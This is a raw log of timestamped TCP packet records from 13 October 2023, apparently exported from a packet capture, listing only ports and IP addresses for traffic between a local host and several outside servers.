Oct 13, 2023 15:21:19.036099911 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.036108017 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.036305904 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.037642956 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:19.083290100 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:19.204372883 CEST	80	49731	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:19.204562902 CEST	49731	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:19.213422060 CEST	80	49745	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:19.213537931 CEST	49745	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:19.300968885 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:19.391590118 CEST	49745	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:19.563005924 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:19.563083887 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:19.706069946 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:19.706146002 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:19.706269979 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:19.706314087 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:19.706926107 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:19.706973076 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:19.707020044 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:19.707065105 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:19.768376112 CEST	80	49745	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:19.787694931 CEST	49751	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:19.790059090 CEST	80	49745	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:19.790115118 CEST	49745	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:19.812524080 CEST	49752	80	192.168.2.5	95.214.27.254
Oct 13, 2023 15:21:20.010860920 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.010921955 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.011064053 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.011080980 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.011097908 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.011102915 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.011127949 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.011140108 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.011173010 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.011214972 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.011301041 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.011336088 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.011373043 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.011408091 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.011431932 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.011466980 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.098762035 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.122132063 CEST	80	49752	95.214.27.254	192.168.2.5
Oct 13, 2023 15:21:20.122206926 CEST	49752	80	192.168.2.5	95.214.27.254
Oct 13, 2023 15:21:20.122747898 CEST	49752	80	192.168.2.5	95.214.27.254
Oct 13, 2023 15:21:20.141809940 CEST	80	49751	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:20.141992092 CEST	49751	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:20.143536091 CEST	49751	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:20.143577099 CEST	49751	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:20.159133911 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:20.314904928 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.314990044 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.315080881 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.315108061 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.315124989 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.315140009 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.315788984 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.315826893 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.315835953 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.315860033 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.315869093 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.315876007 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.315902948 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.315932989 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.315943956 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.315964937 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.315979004 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.316001892 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.316040993 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.316057920 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.316073895 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.316075087 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.316087008 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.316107035 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.316864014 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.316889048 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.316905975 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.316921949 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.316929102 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.316956997 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.316975117 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.421027899 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421545982 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421571016 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421590090 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421605110 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.421610117 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421637058 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.421637058 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.421667099 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.421678066 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421694994 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421715021 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.421719074 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421735048 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421737909 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.421756983 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421757936 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.421771049 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.421780109 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.421796083 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.421813965 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.432060957 CEST	80	49752	95.214.27.254	192.168.2.5
Oct 13, 2023 15:21:20.433170080 CEST	80	49752	95.214.27.254	192.168.2.5
Oct 13, 2023 15:21:20.433226109 CEST	49752	80	192.168.2.5	95.214.27.254
Oct 13, 2023 15:21:20.445442915 CEST	49745	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:20.445991039 CEST	49755	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:20.477891922 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.478096962 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.478111029 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.478123903 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.478286982 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.478301048 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.478341103 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.478382111 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.479702950 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.483062983 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:20.497802019 CEST	80	49751	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:20.497817039 CEST	80	49751	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:20.514667034 CEST	80	49751	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:20.564455032 CEST	49751	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:20.619527102 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.619606018 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.619705915 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.619724035 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.619750977 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.619777918 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.619859934 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.619877100 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.619898081 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.619899035 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.619910955 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.619937897 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.619992971 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.620029926 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.620452881 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.620496035 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.620512009 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.620567083 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.620598078 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.620635986 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.620654106 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.620675087 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.620974064 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621004105 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621012926 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.621037006 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.621098995 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621134996 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.621154070 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621190071 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.621238947 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621275902 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.621428967 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621464968 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.621503115 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621536016 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.621565104 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621601105 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.621649981 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621689081 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.621737957 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621777058 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.621953011 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.621990919 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.622040987 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.622076035 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.622112036 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.622147083 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.622179985 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.622215986 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.622251034 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.622282028 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.623750925 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.623804092 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.623842955 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.623887062 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.623965979 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.624011993 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.624027014 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.624063969 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.624145985 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.624183893 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.624233961 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.624273062 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.744220018 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.744292021 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.744441986 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.744458914 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.744482994 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.744498014 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.744508028 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.744508028 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.744546890 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.744561911 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.744586945 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.744623899 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.744641066 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.744666100 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.744705915 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.744831085 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.744875908 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.744910955 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.744954109 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.745066881 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.745117903 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.745276928 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.745317936 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.745356083 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.745393991 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.745434046 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.745481014 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.745491028 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.745534897 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.745598078 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.745640039 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.745647907 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.745677948 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.745753050 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.745798111 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.745817900 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.745855093 CEST	8000	49744	49.12.118.151	192.168.2.5
Oct 13, 2023 15:21:20.745858908 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.745891094 CEST	49744	8000	192.168.2.5	49.12.118.151
Oct 13, 2023 15:21:20.796947956 CEST	80	49755	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:20.797033072 CEST	49755	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:20.814893961 CEST	49755	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:20.822144985 CEST	80	49745	79.137.192.18	192.168.2.5
Oct 13, 2023 15:21:20.822201967 CEST	49745	80	192.168.2.5	79.137.192.18
Oct 13, 2023 15:21:20.843110085 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.862211943 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:20.868153095 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:20.868154049 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:20.924411058 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924439907 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924489975 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.924510956 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924527884 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.924537897 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924549103 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.924555063 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924571037 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924577951 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.924616098 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.924616098 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.924640894 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924685955 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.924711943 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924763918 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.924808025 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924849033 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.924879074 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924918890 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.924948931 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.924990892 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925008059 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925045967 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925049067 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925086021 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925124884 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925167084 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925195932 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925239086 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925270081 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925307035 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925316095 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925343037 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925369024 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925411940 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925445080 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925483942 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925507069 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925544977 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925549984 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925580978 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925602913 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925642967 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925645113 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925687075 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925725937 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925766945 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925805092 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925826073 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925849915 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925874949 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925885916 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925926924 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.925935984 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.925986052 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.926492929 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.926549911 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.926578999 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.926620960 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.926675081 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.926703930 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.926716089 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.926743984 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.926785946 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.926821947 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.926903009 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.926942110 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927021980 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927062988 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927090883 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927131891 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927172899 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927215099 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927248955 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927288055 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927321911 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927366018 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927393913 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927434921 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927465916 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927505970 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927536011 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927577972 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927612066 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927664995 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927669048 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927706003 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927908897 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.927952051 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.927958965 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.928002119 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.928008080 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.928052902 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.928081036 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:20.928122997 CEST	49742	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:20.928175926 CEST	80	49742	14.33.209.147	192.168.2.5
